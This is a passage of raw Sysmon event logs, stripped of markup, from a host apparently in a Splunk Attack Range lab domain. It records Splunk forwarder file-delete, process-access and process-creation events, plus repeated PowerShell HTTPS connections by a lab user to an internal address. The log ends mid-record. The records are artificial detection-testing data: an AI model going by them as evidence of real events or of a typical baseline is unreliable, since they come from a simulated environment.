13:18:28.749{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=DFFD6C6778463E090BB0B91598C2433B,SHA256=B75C5CEE0A993CF0B7AE99FED7643CD1446E9EF98869736C3B90FEC89C971185,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497652Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:28.581{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=43E5324D852CB5C987F8B59EC43D3604,SHA256=CCC088256601A1146D5FEB6A3A154C48806BD8BF8AAFB461D8091E06187F1DA2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497655Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:29.611{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=78CCE625A98A7A2DC1517CE94DC8EB85,SHA256=D9D879A6968B230018E578A3730F6A15E125535485A02C02C1627E144CFBDDCA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036497654Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:59.282{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50559-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036497656Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:30.643{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A829F43C2CC0BC69887D8F1FAA6F461A,SHA256=5D5EAA25E8353439814287FF87CDC2E174BB6169B4B434115632C7ED66EE616E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497657Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:31.661{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=47678ED78DCF4ECAB43351369DF3488B,SHA256=3DC7FB88BD126A48A326246BE5464DDBE01FC3D0B6D06ECF8693F18E0FE79DE8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497660Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:32.676{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C56E0B48C3652E70E0A5A08637637DF9,SHA256=5536D425000FD1A256043454FD954F397D5D410EA1933DEFBA744107025B1992,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497659Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:32.560{B81B27B7-4013-611D-2700-00000000C801}2076NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=9D45E1BDB6F237A6CF51FFC6A12E6130,SHA256=87EEE278CDF62B2B86AF9CB87BDB04BAFB10272CEA175D83979B0C43158C5AB9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036497658Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:02.746{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50560-false10.0.1.12-8000- 23542300x800000000000000036497661Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:33.721{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D112E51778022162D1971A27C864D49F,SHA256=5D17A6238B6117FA212C28F777003F155F09C5F0E913647215D01F647BE13420,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497664Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:34.738{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EB0CAD1EFBA0B3593DA7C8DA61771E9C,SHA256=C41F7CDFBB4DD23ECFD6CD51E629E84DFF8A48E86B6061E8D048153CC703EA0F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497663Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:34.620{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=1138392D6134E73AFC387B0907D1C759,SHA256=322F0F2BC151F351F810257D79D9F65C03D0952008C7411E33BF991A7A85864F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036497662Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:04.224{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50561-false10.0.1.12-8089- 23542300x800000000000000036497666Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:35.756{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EEA01EE6BDEE67A363F8F9B95A34560A,SHA256=B956A17FB734F753AFF8D81438044B6ED8A6682FF4A49066A3A1967200BC969D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036497665Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:05.291{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50562-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036497667Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:36.770{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1740670A99699E4B99AE1367025B2A1E,SHA256=C456B2C7C596D88C437820E40984868C4CC6C0571ED69F012FA27B12290B9B57,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036497676Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:37.929{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-A12D-6140-8A56-04000000C801}5460C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497675Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:37.927{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497674Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:37.927{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497673Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:37.927{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497672Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:37.926{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497671Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:37.926{B81B27B7-4012-611D-0500-00000000C801}420536C:\Windows\system32\csrss.exe{B81B27B7-A12D-6140-8A56-04000000C801}5460C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036497670Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:37.926{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-A12D-6140-8A56-04000000C801}5460C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036497669Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:37.909{B81B27B7-A12D-6140-8A56-04000000C801}5460C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000036497668Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:37.784{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A01F9C8F9BB6B4A38BD4AF3C880D47B9,SHA256=C356B3A7EB0F4DB1485E53FE26240D96BB531EEE7B03B5EB725634DDA4B73BAC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497690Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:38.938{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BDC52643E25FEDD6FA6C02D06AA1332B,SHA256=73E21B5C251797FB644449B824C20C878263CF756F259731A118ADEC52217505,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497689Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:38.937{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1899D4BE6639D2E3096BA1E15CFE1DED,SHA256=0043F40F88FA106892A633986602A44DAA9C3EC4795668E5680907A4833D355C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036497688Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:38.802{B81B27B7-A12E-6140-8B56-04000000C801}64961284C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000036497687Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:38.802{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=543D43E05FCA4F3B3CFCEF5C99AFA37A,SHA256=64FDE0F32E8F52FAFD653A70EB58C9A7D7EF04C9D79836FAEFDE71ECC9EB61CC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036497686Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:38.639{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-A12E-6140-8B56-04000000C801}6496C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497685Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:38.637{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497684Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:38.637{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497683Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:38.637{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497682Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:38.637{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497681Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:38.637{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-A12E-6140-8B56-04000000C801}6496C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036497680Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:38.636{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-A12E-6140-8B56-04000000C801}6496C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036497679Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:38.618{B81B27B7-A12E-6140-8B56-04000000C801}6496C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x800000000000000036497678Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:08.739{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50563-false10.0.1.12-8000- 10341000x800000000000000036497677Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:38.087{B81B27B7-A12D-6140-8A56-04000000C801}5460800C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program 